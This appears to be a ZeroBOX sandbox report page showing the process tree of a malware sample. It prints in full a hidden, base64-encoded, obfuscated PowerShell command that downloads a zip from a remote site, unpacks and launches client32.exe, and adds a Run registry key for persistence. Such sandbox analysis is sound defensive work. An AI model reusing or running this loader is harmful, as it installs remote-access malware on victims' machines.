| ZeroBOX

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\locals.ps1
508
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc JgAoACcAYwBkACcAKQAgACQAewBFAE4AYABWADoAYQBQAGAAcABEAGAAQQBUAGEAfQA7ACAAJAB7AEwAYABJAE4AawB9AD0AKAAiAHsANAB9AHsAMgB9AHsAMQB9AHsAMAB9AHsAMQAwAH0AewA4AH0AewA1AH0AewAzAH0AewA5AH0AewA3AH0AewA2AH0AewAxADEAfQAiACAALQBmACAAJwBwACcALAAnAHIAZQBzACcALAAnAHMAOgAvAC8AJwAsACcAaQAnACwAJwBoAHQAdABwACcALAAnAGUAbgB0AC8AcABsAHUAZwAnACwAJwBnAGkAdgAnACwAJwBzAC8AJwAsACcAbwBuAHQAJwAsACcAbgAnACwAJwByAG8ALgBpAGQALwB3AHAALQBjACcALAAnAGUAbQBlAC4AcABoAHAAJwApADsAIAAkAHsAcgBuAGAAVQBNAH0APQAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBuAGQAJwAsACcAbwBtACcALAAnAEcAZQB0AC0AUgAnACkAIAAtAG0AaQBuAGkAbQB1AG0AIAA1ACAALQBtAGEAeABpAG0AdQBtACAAOQA7ACAAJAB7AHIAYABSAG4AYABVAE0AfQA9ACYAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBSAGEAbgBkACcALAAnAG8AbQAnACwAJwAtACcALAAnAEcAZQB0ACcAKQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAHsAQwBIAGAAUgBzAH0APQAoACIAewA4AH0AewA5AH0AewA2AH0AewAyAH0AewAxADAAfQB7ADEAMQB9AHsAMQAyAH0AewAwAH0AewAxADQAfQB7ADQAfQB7ADEAMwB9AHsANQB9AHsAMwB9AHsANwB9AHsAMQB9ACIAIAAtAGYAIAAnAEQAJwAsACcAUABSAFMAVABVAFYAVwBYAFkAWgAnACwAJwBwAHMAdAB1AHYAdwAnACwAJwBLAEwATQAnACwAJwBGACcALAAnAEoAJwAsACcAbQBuAG8AJwAsACcATgBPACcALAAnAGEAYgBjAGQAZQBmAGcAaABpACcALAAnAGoAawBsACcALAAnAHgAJwAsACcAeQB6ACcALAAnAEEAQgBDACcALAAnAEcASABJACcALAAnAEUAJwApADsAIAAkAHsAUgBgAFMAVABSAH0APQAnACcAOwAgACQAewByAGAAQQBuAH0APQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcATgBlAHcALQBPACcALAAnAGIAagBlACcALAAnAGMAJwAsACcAdAAnACkAIAAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAG0ALgBSAGEAJwAsACcAUwB5AHMAdABlACcALAAnAG0AJwAsACcAbgBkAG8AJwApADsAIABmAG8AcgAgACgAJAB7AGkAfQA9ADAAOwAgACQAewBpAH0AIAAtAGwAdAAgACQAewByAGAATgB1AE0AfQA7ACAAJAB7AEkAfQArACsAKQAgAHsAJAB7AHIAcwBgAFQAUgB9ACsAPQAkAHsAYwBgAGgAUgBzAH0AWwAkAHsAcgBgAEEAbgB9AC4AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4AZQB4ACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAwACwAIAAkAHsAQwBoAGAAUgBTAH0ALgAiAEwARQBuAEcAYABUAGgAIgApAF0AfQA7ACAAJAB7AFIAWgBgAGkAcAB9AD0AJAB7AHIAcwBgAFQAUgB9ACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgAnACwAJwB6AGkAcAAnACkAOwAgACQAewBQAGAAQQB0AGgAfQA9ACQAewBFAG4AVgA6AGAAQQBwAFAAYABEAEEAVABBAH0AKwAnAFwAJwArACQAewBSAGAAWgBpAHAAfQA7ACAAJAB7AFAAegBgAGkAcAB9AD0AJAB7AEUAbgBgAFYAOgBBAGAAcABQAGQAQQBgAFQAYQB9ACsAKAAoACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdQBwAGQAJwAsACcATgAwAFQARQAnACwAJwBOAEUAJwAsACcAYQB0AGUAXwAnACwAJwBRAHQAUwBPACcAKQApAC4AIgBSAGUAcABgAEwAYQBgAGMAZQAiACgAJwBRAHQAUwAnACwAWwBTAFQAUgBpAE4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAKwAkAHsAUgByAGAATgBgAFUAbQB9ADsAIAAuACgAIgB7ADQAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADUAfQB7ADIAfQAiAC0AZgAgACcAdABhAHIAdAAnACwAJwAtACcALAAnAHIAJwAsACcAQgBpAHQAcwBUAHIAJwAsACcAUwAnACwAJwBhAG4AcwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAQQBgAFQAaAB9ADsAIAAmACgAIgB7ADMAfQB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAHYAJwAsACcAZQAnACwAJwBoAGkAJwAsACcAZQB4AHAAYQBuAGQALQBhAHIAYwAnACkAIAAtAHAAYQB0AGgAIAAkAHsAUABhAGAAVABIAH0AIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJAB7AFAAWgBgAGkAcAB9ADsAIAAkAHsAZgBgAE8ATABkAH0APQAmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAZQAnACwAJwBHACcALAAnAHQALQBJAHQAZQBtACcAKQAgACQAewBwAFoAYABJAFAAfQAgAC0ARgBvAHIAYwBlADsAIAAkAHsAZgBvAGAAbABEAH0ALgAiAGEAYABUAHQAcgBgAGkAQgBgAFUAdABlAFMAIgA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgAnACwAJwBIAGkAZABkAGUAJwApADsAIAAmACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBmACcAZQBtAG8AdgBlAC0AJwAsACcAUgAnACwAJwBlAG0AJwAsACcASQB0ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGAAQQB0AEgAfQA7ACAAJgAoACcAYwBkACcAKQAgACQAewBQAHoAYABJAFAAfQA7ACAAJgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHMAdABhAHIAJwAsACcAdAAnACkAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeABlACcALAAnADIALgAnACwAJwBjAGwAaQBlAG4AdAAzACcAKQA7ACAAJAB7AGYAYABzAFQAUgB9AD0AJAB7AHAAYABaAEkAcAB9ACsAKAAoACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiACAALQBmACAAJwBxAEwAbwBjAGwAaQBlAG4AJwAsACcAdAAzACcALAAnAC4AZQB4AGUAJwAsACcAMgAnACkAKQAtAEMAcgBlAFAAbABhAGMAZQAgACAAKABbAGMASABhAFIAXQAxADEAMwArAFsAYwBIAGEAUgBdADcANgArAFsAYwBIAGEAUgBdADEAMQAxACkALABbAGMASABhAFIAXQA5ADIAKQA7ACAAJAB7AHIAYABOAE0AfQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAHAAZABhAHQAJwAsACcATwBOAEUATgAwAFQARQB1ACcALAAnAGUAXwAnACkAKwAkAHsAUgBgAFIATgBgAFUATQB9ADsAIAAuACgAIgB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQAiACAALQBmACcAdAAnACwAJwBlAHcALQAnACwAJwBOACcALAAnAGUAbQBQAHIAbwBwAGUAcgB0AHkAJwAsACcASQAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsANQB9AHsAMwB9AHsAMQB9AHsANwB9AHsAOQB9AHsAMQAxAH0AewAyAH0AewA4AH0AewAxADAAfQB7ADQAfQB7ADAAfQB7ADYAfQAiACAALQBmACAAJwAwAH0AUgAnACwAJwBDAFUAOgB7ADAAfQBTACcALAAnAG8AZgB0AHsAMAB9AFcAaQBuAGQAbwB3ACcALAAnAEsAJwAsACcAZQByAHMAaQBvAG4AewAnACwAJwBIACcALAAnAHUAbgAnACwAJwBPAEYAVABXAEEAUgBFAHsAMAB9AE0AaQBjACcALAAnAHMAewAwAH0AQwB1AHIAcgBlACcALAAnAHIAJwAsACcAbgB0AFYAJwAsACcAbwBzACcAKQApAC0AZgAgAFsAQwBIAGEAcgBdADkAMgApACAALQBOAGEAbQBlACAAJAB7AFIAYABOAE0AfQAgAC0AVgBhAGwAdQBlACAAJAB7AGYAcwBgAFQAUgB9ACAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFMAdAByAGkAJwAsACcAbgBnACcAKQA7AA==
  2156

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents